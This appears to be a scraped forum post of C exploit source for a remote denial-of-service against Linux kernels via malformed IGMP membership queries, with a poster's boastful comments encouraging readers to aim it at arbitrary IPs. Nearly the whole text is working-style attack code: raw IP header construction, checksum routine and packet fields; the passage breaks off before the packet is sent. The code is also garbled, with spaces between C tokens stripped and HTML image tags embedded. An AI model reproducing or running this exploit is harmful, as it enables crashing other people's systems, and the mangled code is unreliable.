**
THIS code wich can attack NOT just LAN, is NOT kcopes and, is based
more on the ICMPv3 membership query bug... wich was for windows but also
affects linux, in IMPv3 tho go figure... anyhow, this can now be
easily made into a very fast packet machine ,and since it doesnt care
what the ips are, i guess could be seen results, remotely... feel free
to update/send in comment... all comments, go thru ME, XD , before any
type of publishing, so be sure that codes are safe and, i only put here,
corrected codes...simple... so, please dont go adding it to your lame
d0s collection coz, ill just fark it up , and, i mean, the packet is
easy to block since it is released...right

XD loves u all

** Example:

** ./attacklinux SRC_IP DST_IP

** The Linux Kernel at the remote side will Panic

** when sent over the network -still in testing!

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <netinet/in.h>

#include <netdb.h>

#include <sys/time.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <arpa/inet.h>

#include <unistd.h>

structiphdr{

unsignedcharihl:4,version:4,tos;

unsignedshorttot_len,id,frag_off;

unsignedcharttl,protocol;

unsignedshortcheck;

unsignedintsaddr,daddr;

unsignedintoptions1;

unsignedintoptions2;

};

structigmp_query{

unsignedchartype;

unsignedcharmaxresponse;

unsignedshortcsum;

unsignedintmcast;

charpadding[40];

};

// unsigned short in_chksum(unsigned short *, int); // removed by xd , thx for trying to cripple but no work

unsignedshortin_chksum(unsignedshort*addr,intlen);// this was crippled, notice that this was uptop, so you dd not see the

//
bugged up in_chksum wich wont make this works <img
src="http://crazycoders.com/wp-includes/images/smilies/icon_smile.gif"
alt=":)"> NOW try it.

unsignedshortin_chksum(unsignedshort*addr,intlen){

registerintnleft=len;

registerintsum=0;

u_short answer=0;

while(nleft>1){

sum+=*addr++;

nleft-=2;

}

if(nleft==1){

*(u_char *)(&amp;answer)=*(u_char *)addr;

sum+=answer;

}

sum=(sum>>16)+(sum&amp;0xffff);

sum+=(sum>>16);

answer=~sum;

return(answer);

}

longresolve(char*);

longresolve(char*host){

structhostent *hst;

longaddr;

hst=gethostbyname(host);

if(hst==NULL)

return(-1);

memcpy(&amp;addr,hst->h_addr,hst->h_length);

return(addr);

}

intmain(intargc,char*argv[]){

structsockaddr_in dst;

structiphdr *ip;

structigmp_query *igmp;

longdaddr,saddr;

ints,i=0,c,len,one=1;

charbuf[1500];

if(argc<3){

printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"

"credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");

printf("Usage: %s <src ip> <dst ip>\n",*argv);//
yea, try any ip and see, i guess its worth a shot... or not <img
src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif"
alt=":P">

return(1);

}

daddr=resolve(argv[2]);

saddr=resolve(argv[1]);

memset(buf,0,1500);

ip=(structiphdr *)&amp;buf;

igmp=(structigmp_query*)&amp;buf[sizeof(structiphdr)];

dst.sin_addr.s_addr=daddr;

dst.sin_family=AF_INET;

ip->ihl=7;

ip->version=4;

ip->tos=0;

ip->tot_len=htons(sizeof(structiphdr)+8);

ip->id=htons(18277);

ip->frag_off=0;

ip->ttl=1;

ip->protocol=IPPROTO_IGMP;

ip->check=in_chksum((unsignedshort*)ip,sizeof(structiphdr));

ip->saddr=saddr;

ip->daddr=daddr;

ip->options1=0;

ip->options2=0;

igmp->type=0x11;

igmp->maxresponse=0xff;

igmp->mcast=inet_addr("0.0.0.0");// mod here ,now we can attack the IP we actually put in

igmp->csum=0;//For computing the checksum, the Checksum field is set to zero.